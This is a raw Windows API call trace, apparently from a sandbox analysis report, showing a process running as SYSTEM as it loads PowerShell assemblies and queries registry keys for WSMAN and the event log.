	[0089.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.118] GetLastError () returned 0x57
	[0089.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.119] GetLastError () returned 0x57
	[0089.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14e460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0089.121] GetLastError () returned 0x57
	[0089.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14e460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0089.121] GetLastError () returned 0x57
	[0089.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0089.122] GetLastError () returned 0x57
	[0089.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0089.122] GetLastError () returned 0x57
	[0089.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14e460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0089.124] GetLastError () returned 0x57
	[0089.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14e460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0089.124] GetLastError () returned 0x57
	[0089.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14e460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0089.126] GetLastError () returned 0x57
	[0089.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14e460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0089.126] GetLastError () returned 0x57
	[0089.130] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.130] GetLastError () returned 0xcb
	[0089.130] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.130] GetLastError () returned 0xcb
	[0089.131] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.131] GetLastError () returned 0xcb
	[0089.132] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.132] GetLastError () returned 0xcb
	[0089.134] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.134] GetLastError () returned 0xcb
	[0089.136] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.136] GetLastError () returned 0xcb
	[0089.137] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.137] GetLastError () returned 0xcb
	[0089.141] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e80c | out: phkResult=0x14e80c*=0x29c) returned 0x0
	[0089.142] RegQueryInfoKeyW (in: hKey=0x29c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14e85c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14e860, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14e85c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14e860*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.143] RegEnumValueW (in: hKey=0x29c, dwIndex=0x0, lpValueName=0x361778, lpcchValueName=0x14e884, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x14e884, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0089.143] RegEnumValueW (in: hKey=0x29c, dwIndex=0x1, lpValueName=0x361778, lpcchValueName=0x14e884, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x14e884, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0089.143] RegEnumValueW (in: hKey=0x29c, dwIndex=0x2, lpValueName=0x361778, lpcchValueName=0x14e884, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x14e884, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0089.144] RegQueryValueExW (in: hKey=0x29c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14e864, lpData=0x0, lpcbData=0x14e860*=0x0 | out: lpType=0x14e864*=0x1, lpData=0x0, lpcbData=0x14e860*=0x8) returned 0x0
	[0089.144] RegQueryValueExW (in: hKey=0x29c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14e864, lpData=0x361778, lpcbData=0x14e860*=0x8 | out: lpType=0x14e864*=0x1, lpData="2.0", lpcbData=0x14e860*=0x8) returned 0x0
	[0089.191] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e7c8 | out: phkResult=0x14e7c8*=0x2a0) returned 0x0
	[0089.191] RegQueryInfoKeyW (in: hKey=0x2a0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14e818, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14e81c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14e818*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14e81c*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.191] RegEnumValueW (in: hKey=0x2a0, dwIndex=0x0, lpValueName=0x361778, lpcchValueName=0x14e840, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x14e840, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0089.191] RegEnumValueW (in: hKey=0x2a0, dwIndex=0x1, lpValueName=0x361778, lpcchValueName=0x14e840, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x14e840, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0089.191] RegEnumValueW (in: hKey=0x2a0, dwIndex=0x2, lpValueName=0x361778, lpcchValueName=0x14e840, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x14e840, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0089.191] RegQueryValueExW (in: hKey=0x2a0, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14e820, lpData=0x0, lpcbData=0x14e81c*=0x0 | out: lpType=0x14e820*=0x1, lpData=0x0, lpcbData=0x14e81c*=0x8) returned 0x0
	[0089.191] RegQueryValueExW (in: hKey=0x2a0, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14e820, lpData=0x361778, lpcbData=0x14e81c*=0x8 | out: lpType=0x14e820*=0x1, lpData="2.0", lpcbData=0x14e81c*=0x8) returned 0x0
	[0089.192] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.192] GetLastError () returned 0xcb
	[0089.194] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.194] GetLastError () returned 0xcb
	[0089.197] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e788 | out: phkResult=0x14e788*=0x2a4) returned 0x0
	[0089.197] RegQueryInfoKeyW (in: hKey=0x2a4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14e7f0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14e7ec, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14e7f0*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14e7ec*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.198] RegEnumKeyExW (in: hKey=0x2a4, dwIndex=0x0, lpName=0x361778, lpcchName=0x14e80c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14e80c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.198] RegEnumKeyExW (in: hKey=0x2a4, dwIndex=0x1, lpName=0x361778, lpcchName=0x14e80c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14e80c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.198] RegEnumKeyExW (in: hKey=0x2a4, dwIndex=0x2, lpName=0x361778, lpcchName=0x14e80c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14e80c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.198] RegEnumKeyExW (in: hKey=0x2a4, dwIndex=0x3, lpName=0x361778, lpcchName=0x14e80c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14e80c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.198] RegEnumKeyExW (in: hKey=0x2a4, dwIndex=0x4, lpName=0x361778, lpcchName=0x14e80c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14e80c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.198] RegEnumKeyExW (in: hKey=0x2a4, dwIndex=0x5, lpName=0x361778, lpcchName=0x14e80c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14e80c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.199] RegEnumKeyExW (in: hKey=0x2a4, dwIndex=0x6, lpName=0x361778, lpcchName=0x14e80c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14e80c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.199] RegEnumKeyExW (in: hKey=0x2a4, dwIndex=0x7, lpName=0x361778, lpcchName=0x14e80c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14e80c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.199] RegEnumKeyExW (in: hKey=0x2a4, dwIndex=0x8, lpName=0x361778, lpcchName=0x14e80c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14e80c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.199] RegOpenKeyExW (in: hKey=0x2a4, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e7b8 | out: phkResult=0x14e7b8*=0x2c0) returned 0x0
	[0089.199] RegOpenKeyExW (in: hKey=0x2c0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e7b8 | out: phkResult=0x14e7b8*=0x0) returned 0x2
	[0089.199] RegOpenKeyExW (in: hKey=0x2a4, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e7b8 | out: phkResult=0x14e7b8*=0x2d0) returned 0x0
	[0089.199] RegOpenKeyExW (in: hKey=0x2d0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e7b8 | out: phkResult=0x14e7b8*=0x0) returned 0x2
	[0089.199] RegOpenKeyExW (in: hKey=0x2a4, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e7b8 | out: phkResult=0x14e7b8*=0x2d4) returned 0x0
	[0089.200] RegOpenKeyExW (in: hKey=0x2d4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e7b8 | out: phkResult=0x14e7b8*=0x0) returned 0x2
	[0089.200] RegOpenKeyExW (in: hKey=0x2a4, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e7b8 | out: phkResult=0x14e7b8*=0x2d8) returned 0x0
	[0089.200] RegOpenKeyExW (in: hKey=0x2d8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e7b8 | out: phkResult=0x14e7b8*=0x0) returned 0x2
	[0089.200] RegOpenKeyExW (in: hKey=0x2a4, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e7b8 | out: phkResult=0x14e7b8*=0x2dc) returned 0x0
	[0089.200] RegOpenKeyExW (in: hKey=0x2dc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e7b8 | out: phkResult=0x14e7b8*=0x0) returned 0x2
	[0089.200] RegOpenKeyExW (in: hKey=0x2a4, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e7b8 | out: phkResult=0x14e7b8*=0x2e0) returned 0x0
	[0089.200] RegOpenKeyExW (in: hKey=0x2e0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e7b8 | out: phkResult=0x14e7b8*=0x0) returned 0x2
	[0089.200] RegOpenKeyExW (in: hKey=0x2a4, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e7b8 | out: phkResult=0x14e7b8*=0x2e4) returned 0x0
	[0089.200] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e7b8 | out: phkResult=0x14e7b8*=0x0) returned 0x2
	[0089.200] RegOpenKeyExW (in: hKey=0x2a4, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e7b8 | out: phkResult=0x14e7b8*=0x2e8) returned 0x0
	[0089.200] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e7b8 | out: phkResult=0x14e7b8*=0x0) returned 0x2
	[0089.200] RegOpenKeyExW (in: hKey=0x2a4, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e7b8 | out: phkResult=0x14e7b8*=0x2ec) returned 0x0
	[0089.201] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e7b8 | out: phkResult=0x14e7b8*=0x2f0) returned 0x0
	[0089.201] RegCloseKey (hKey=0x2f0) returned 0x0
	[0089.201] RegCloseKey (hKey=0x2a4) returned 0x0
	[0089.201] RegCloseKey (hKey=0x2ec) returned 0x0
	[0089.208] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x367d10, nSize=0x14e904 | out: lpNameBuffer="WORKGROUP\\ZGW5TDPU$", nSize=0x14e904) returned 0x1
	[0089.209] GetLastError () returned 0x3
	[0089.210] GetUserNameW (in: lpBuffer=0x361778, pcbBuffer=0x14e90c | out: lpBuffer="SYSTEM", pcbBuffer=0x14e90c) returned 1
	[0089.233] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e76c | out: phkResult=0x14e76c*=0x2f4) returned 0x0
	[0089.233] RegQueryInfoKeyW (in: hKey=0x2f4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14e7d4, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14e7d0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14e7d4*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14e7d0*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.233] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x0, lpName=0x361778, lpcchName=0x14e7f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14e7f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.233] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x1, lpName=0x361778, lpcchName=0x14e7f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14e7f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.233] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x2, lpName=0x361778, lpcchName=0x14e7f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14e7f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.233] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x3, lpName=0x361778, lpcchName=0x14e7f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14e7f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.233] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x4, lpName=0x361778, lpcchName=0x14e7f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14e7f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.234] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x5, lpName=0x361778, lpcchName=0x14e7f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14e7f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.234] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x6, lpName=0x361778, lpcchName=0x14e7f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14e7f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.234] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x7, lpName=0x361778, lpcchName=0x14e7f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14e7f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.234] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x8, lpName=0x361778, lpcchName=0x14e7f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14e7f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.234] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x2f8) returned 0x0
	[0089.235] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x0) returned 0x2
	[0089.235] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x2fc) returned 0x0
	[0089.235] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x0) returned 0x2
	[0089.235] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x300) returned 0x0
	[0089.235] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x0) returned 0x2
	[0089.235] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x304) returned 0x0
	[0089.235] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x0) returned 0x2
	[0089.235] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x308) returned 0x0
	[0089.235] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x0) returned 0x2
	[0089.235] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x30c) returned 0x0
	[0089.236] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x0) returned 0x2
	[0089.236] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x310) returned 0x0
	[0089.236] RegOpenKeyExW (in: hKey=0x310, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x0) returned 0x2
	[0089.236] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x314) returned 0x0
	[0089.236] RegOpenKeyExW (in: hKey=0x314, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x0) returned 0x2
	[0089.236] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x318) returned 0x0
	[0089.236] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e79c | out: phkResult=0x14e79c*=0x31c) returned 0x0
	[0089.236] RegCloseKey (hKey=0x31c) returned 0x0
	[0089.236] RegCloseKey (hKey=0x2f4) returned 0x0
	[0089.237] RegCloseKey (hKey=0x318) returned 0x0
	[0089.237] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e76c | out: phkResult=0x14e76c*=0x318) returned 0x0
	[0089.237] RegQueryInfoKeyW (in: hKey=0x318, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14e7d4, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14e7d0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14e7d4*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14e7d0*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0089.237] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x0, lpName=0x361778, lpcchName=0x14e7f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14e7f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
